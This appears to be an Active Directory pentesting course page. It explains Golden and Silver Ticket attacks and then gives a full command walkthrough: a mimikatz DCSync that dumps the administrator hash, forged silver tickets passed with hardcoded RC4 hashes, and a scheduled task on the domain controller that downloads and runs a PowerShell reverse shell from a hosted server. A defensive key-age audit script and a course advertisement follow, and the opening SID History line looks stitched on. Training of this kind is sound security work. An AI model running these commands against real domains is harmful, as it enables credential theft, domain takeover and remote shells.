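Once a migration is complete the SID History attribute should be cleared, and SID filtering should stay enabled on any trust that is not an intra-forest migration path; both remove the need for this review to find anything.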
Golden Ticket attacks can be carried out against Active Directory domains, where access control is implemented using Kerberos tickets issued to authenticated users by a Key Distribution Service. The attacker gains control over the domain’s Key Distribution Service account (KRBTGT account) by stealing its NTLM hash. This allows the attacker to generate Ticket Granting Tickets (TGTs) for any account in the Active Directory domain. With valid TGTs, the attacker can request access to any resource/system on its domain from the Ticket Granting Service (TGS).
Because the attacker controls the component of the access control system that is responsible for issuing Ticket Granting Tickets (TGTs), they effectively hold a golden ticket to any resource in the domain.
. .\powerview
Get-DomainSID
S-1-5-21-1070240333-336889418-1185445934
#run dcsync to get administrator's HASH
. .\invoke-mimikatz
invoke-mimikatz -Command '"lsadump::dcsync /user:pentesting\administrator"'
#Create a Silver Ticket for the HOST service on the DC
Invoke-Mimikatz -Command '"kerberos::golden /domain:pentesting.local /sid:S-1-5-21-1070240333-336889418-1185445934 /target:dc.pentesting.local /service:HOST /rc4:2b576acbe6bcfda7294d6bd18041b8fe /user:Administrator /ptt"'
#List the current ticket
klist
#See if you have access
schtasks /s dc.pentesting.local
#edit Invoke-PowerShellTcp.ps1 or Invoke-PowerShellTcpOneLine.ps1
#Download it from here: https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcpOneLine.ps1
#add the following at the end of the file
Invoke-PowerShellTcp -Reverse -IPAddress <localIP> -Port 443
#Host the edited Invoke-PowerShellTcp.ps1 with HFS:
https://www.rejetto.com/hfs/?f=dl
#listen with Powercat
powercat -l -v -p 4444 -t 1000
#Schedule a task
schtasks /create /S dc.pentesting.local /SC Weekly /RU "NT Authority\SYSTEM" /TN "STCheck" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://192.168.1.55/Invoke-PowerShellTcpOneLine.ps1''')'"
#Run The task
schtasks /Run /S dc.pentesting.local /TN "STCheck"
#Extra
#Using hash of the Domain Controller computer account, below
#command provides access to shares on the DC.
Invoke-Mimikatz -Command '"kerberos::golden /domain:pentesting.local /sid:S-1-5-21-1070240333-336889418-1185445934 /target:pentesting.local /service:CIFS /rc4:2723620aa872abc65ea53178070f4bc7 /user:Administrator /ptt"'
#Similar command can be used for any other service on a machine.
Which services? SPN: HOST, RPCSS, WSMAN and many more.
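Both forged tickets above are only as durable as the key they were signed with: the krbtgt key for a Golden Ticket, the service account's key (here the DC computer account, for HOST and CIFS) for a Silver Ticket. The script below is an added example for this page (not the course's code) that reports the age of those keys: how long ago krbtgt's password was last set, and every enabled computer account whose password is older than the default 30-day machine-account rotation allows. It assumes the ActiveDirectory module; the thresholds are assumptions.

```powershell
# Added defensive example (not from the course): age of the keys that sign Golden and Silver Tickets.
# Assumes the ActiveDirectory module; thresholds are assumptions to tune.

Import-Module ActiveDirectory

function Get-KerberosKeyAge {
    param(
        [int]$KrbtgtMaxDays   = 180,   # common guidance: rotate at least twice a year
        [int]$ComputerMaxDays = 45     # default machine-account password rotation is 30 days
    )
    $now = Get-Date

    # Golden Ticket key: the KDC accepts tickets under the current and the previous krbtgt key,
    # so forged tickets only die after two rotations (with replication completed in between)
    $krbtgt = Get-ADUser -Identity krbtgt -Properties PasswordLastSet
    $age = [int]($now - $krbtgt.PasswordLastSet).TotalDays
    [pscustomobject]@{
        Account = 'krbtgt'
        Class   = 'kdc'
        AgeDays = $age
        Status  = if ($age -gt $KrbtgtMaxDays) { 'ROTATE twice: old golden tickets remain valid' } else { 'OK' }
    }

    # Silver Ticket keys: each computer account's password signs tickets for its own services
    Get-ADComputer -Filter 'Enabled -eq $true' -Properties PasswordLastSet |
        Where-Object { $_.PasswordLastSet -and $_.PasswordLastSet -lt $now.AddDays(-$ComputerMaxDays) } |
        ForEach-Object {
            [pscustomobject]@{
                Account = $_.SamAccountName
                Class   = 'computer'
                AgeDays = [int]($now - $_.PasswordLastSet).TotalDays
                Status  = 'STALE: machine key unchanged; check rotation policy or decommission'
            }
        }
}

Get-KerberosKeyAge | Sort-Object AgeDays -Descending | Format-Table -AutoSize
```

A Silver Ticket never touches the DC, so the only host-side evidence is the service ticket itself; key rotation is the control that actually bounds its lifetime, which is why a stale machine password on a domain controller deserves the same attention as an old krbtgt password.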
Most enterprise networks today are managed using Windows Active Directory and it is imperative for a security professional to understand the threats to the Windows infrastructure.
Active Directory Pentesting is designed to help security professionals understand, analyze and practice threats and attacks in a modern Active Directory environment. The course is beginner friendly and comes with walkthrough videos and documents listing all the commands executed in the videos. The course is based on our years of experience breaking Windows and AD environments, and on our research.
When it comes to AD security, there is a large knowledge gap which security professionals and administrators struggle to fill. Over the years, I have taken numerous trainings worldwide on AD security and always found that there is a lack of quality material and especially a lack of good walkthroughs and explanation.
The course simulates real-world attack and defense scenarios: we start with a non-admin user account in the domain and work our way up to Enterprise Admin. The focus is on exploiting the variety of overlooked domain features, not just software vulnerabilities.
We cover topics like AD enumeration, tools to use, domain privilege escalation, domain persistence, Kerberos based attacks (Golden ticket, Silver ticket and more), ACL issues, SQL server trusts, and bypasses of defenses.